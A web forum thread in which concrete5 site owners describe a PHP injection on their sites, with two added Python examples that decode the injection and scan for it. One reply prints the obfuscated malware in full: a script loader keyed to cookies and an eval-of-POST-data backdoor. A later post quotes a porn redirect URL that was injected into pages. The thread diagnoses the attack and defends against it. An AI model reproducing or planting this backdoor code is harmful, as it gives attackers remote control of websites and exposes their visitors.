I got hacked (I think)/parse error
Hi all,
I have other sites which got hacked unfortunately.
Now when I log in to my C5 site I get this error before I reach the first logged in page -
Parse error: syntax error, unexpected $end in /home/mydomain/public_html/updates/concrete5.5.2.1/concrete/models/attribute/types/default/controller.php on line 69
line 69 actually reads as
public function search() {
Has this been hacked?
Everything was fine when I first updated.
Thanks in advance for any assistance you can offer,
regards,
Neil
Hi,
thanks so much for the help.
I've attached the file.
There are other errors too, go to
http://www.skywalkerdigital.com
I've changed nothing at all recently but another site of mine on an addon domain got hacked (malicious script at the domain root, it was 301'd at the time) and this is when the error occurred.
My domain host support blame a WordPress plugin, Wassup, on a 3rd domain!
They suggest reinstalling Concrete5.
Thanks again,
Neil
This is definitely funky:
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}
Probably an injection in all your files.
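Added example, not part of the original thread or any poster's code: a static decoder in Python for the snippet quoted above, which recovers the strings the PHP assembles without executing any of it. It parses only the two integer arrays and the XOR key; `SAMPLE`, `decode_injection` and the regex names are this example's own.

```python
import re

# First two loops of the snippet quoted in the thread (the echo/eval tail is
# left out on purpose). This is data to be parsed; it is never executed.
SAMPLE = (
    "$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,"
    "108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,"
    "103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,"
    "99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v)"
    "{$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}"
    "foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v)"
    "{$t[$k]=substr($s,0,$v);$s=substr($s,$v);}"
)

ARRAY_RE = re.compile(r"array\(([\d,\s]+)\)")  # skips the empty array()
XOR_RE = re.compile(r"\$v\^(\d+)")


def decode_injection(php_source):
    """Statically recover the string table the injected PHP builds.

    Returns (fragments, remainder): the pieces the PHP stores in $t and
    whatever is left in $s after the second loop.
    """
    arrays = [[int(n) for n in m.split(",")] for m in ARRAY_RE.findall(php_source)]
    if len(arrays) < 2:
        raise ValueError("expected a byte array and a length array")
    key_match = XOR_RE.search(php_source)
    if key_match is None:
        raise ValueError("no XOR key found")
    key = int(key_match.group(1))
    encoded, lengths = arrays[0], arrays[1]
    # The PHP builds "%c" from urlencode(print_r(array(),1))[5] . "c",
    # so each sprintf call is simply chr($v ^ key).
    text = "".join(chr(v ^ key) for v in encoded)
    fragments = []
    for n in lengths:
        fragments.append(text[:n])
        text = text[n:]
    return fragments, text


if __name__ == "__main__":
    parts, rest = decode_injection(SAMPLE)
    print(parts)
    print(repr(rest))
```

The recovered fragments are pieces of a `<script>` tag and a `document.cookie` assignment that the injected code echoes, and the remainder is the URL prefix it appends to the script source.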
Thanks for the reply.
It's all looking really bad!
My htaccess files were corrupt, they're now blank but the server is 500 erroring now...
Dang!
Before you delete it, can you send a copy of your whole site to me? I'm curious how this hacker came in. (Of course you can delete the config files and other sensitive files.) I'll look at what it's doing and how to prevent this (bugfixing).
Hi Neil,
As adajad said, you have to find all your executable files like .php and remove the funky code. If it is a running site, then it is the only way to get it solved. Otherwise have a fresh install.
Citytech
Thanks for the comments guys, have a good day!
mmm..
Reinstalled everything but still getting errors on login page
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/startup/session.php on line 32
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/startup/session.php on line 32
Warning: Cannot modify header information - headers already sent by (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/libraries/view.php on line 843
Cache, cookies cleared, same thing... :(
Any ideas?
Thanks a lot!
It looks like the same code was injected again, as it's trying to send cookies.
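Added example, not from the thread or from concrete5: a Python scanner for the two steps discussed above, finding every PHP file that carries the injected code and re-checking a fresh install such as `config/site.php` for re-infection. The marker strings are copied from the snippet quoted earlier in the thread; the function names, the extension list and the demo tree are assumptions of this example.

```python
import os
import tempfile

# Substrings taken from the snippet quoted in this thread (no whitespace in either).
MARKERS = {
    "loader": "$s=substr(8,1);foreach(array(",
    "post-eval": "eval(base64_decode(str_replace(chr(32),chr(43),$_POST[",
}
PHP_EXTENSIONS = (".php", ".phtml", ".inc")  # assumption: adjust to the site


def scan_file(path):
    """Return the sorted names of the markers present in one file."""
    with open(path, "r", encoding="latin-1") as fh:  # latin-1 decodes any byte
        # Drop all whitespace so a re-spaced copy of the code still matches.
        squeezed = "".join(fh.read().split())
    return sorted(name for name, needle in MARKERS.items() if needle in squeezed)


def scan_tree(root):
    """Map each flagged PHP file (path relative to root) to its marker names."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_demo_tree(root):
    """Constructed test data: one clean file and one carrying both markers.
    The marked file is cut off mid-statement, so it is not runnable PHP."""
    os.makedirs(os.path.join(root, "config"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello';\n")
    with open(os.path.join(root, "config", "site.php"), "w") as fh:
        fh.write("<?php " + MARKERS["loader"] + "52,123 [cut] "
                 + MARKERS["post-eval"] + " [cut]\n<?php // real config\n")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel_path, hits in scan_tree(build_demo_tree(tmp)).items():
            print(rel_path, hits)
```

A hit lists files to restore from a clean copy; it says nothing about how they were written, so files that are flagged again after a reinstall indicate the write path is still open.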
Hi Vinzent,
thanks for the help.
In layman's terms that means I should reinstall I suppose?
Anything else I should do?
Thanks a lot,
Neil
If you haven't already reinstalled C5, you can do that.
But if you have reinstalled it, something is injecting the files every time you install C5.
If you don't mind, could you send me your current concrete5 folder, so I can research where this comes from?
Hi,
I set up a new empty database and reinstalled but the Russians are still in there :(
What do you need - ftp access, admin login, cpanel access?
Thanks,
Neil
The Russians? Haha. You should change all the passwords first. And if you trust me (I won't edit anything, promise), FTP access would be nice so I can download your whole site and do some research. Also, do you have log files?
You can PM me.
Hi
The Russians have invaded one of my clients too. All my PHP files start with a lot of "$s=substr(8,1);foreach(array.... "
Then in the HTML header tag I get encoded (unescape) redirecting to a porn site. "http://pornvvid.com/secure/?4"
I am 99% sure it is a hacking script running somewhere on the site. My htaccess file was hacked and I removed it. I know, I know. I will replace it when I get a chance. I am also 99% sure that the hackers have the FTP login details. How else could they get in? The only way to block injection is to 555 the files, which makes editing a pain. I can send copies of my infected files if it will help you.
I am not using Concrete because this specific site is on a shared server. So I don't have PHP config access.
Citytech